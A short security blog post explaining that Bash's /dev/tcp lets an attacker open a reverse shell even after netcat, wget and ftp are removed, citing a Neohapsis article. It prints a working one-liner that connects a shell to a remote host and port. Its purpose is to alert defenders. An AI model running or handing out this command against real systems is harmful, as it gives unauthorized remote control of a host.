Bash based reverse shell wickedness

Shell

Neohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell.  Used to be you could remove netcat, wget, ftp, etc… and make it much more difficult for a reverse shell to be started.  Enter the ever friendly and helpful Bash shell.

All you need is:

$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

and tadaa, reverse shell.

Go check it out – http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

Kevin Riggins

About these ads

One Response to Bash based reverse shell wickedness

  1. […] against reverse shell wickedness… In this post, I referenced a very interesting article over at Neohapsis about easily setting up a reverse […]

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: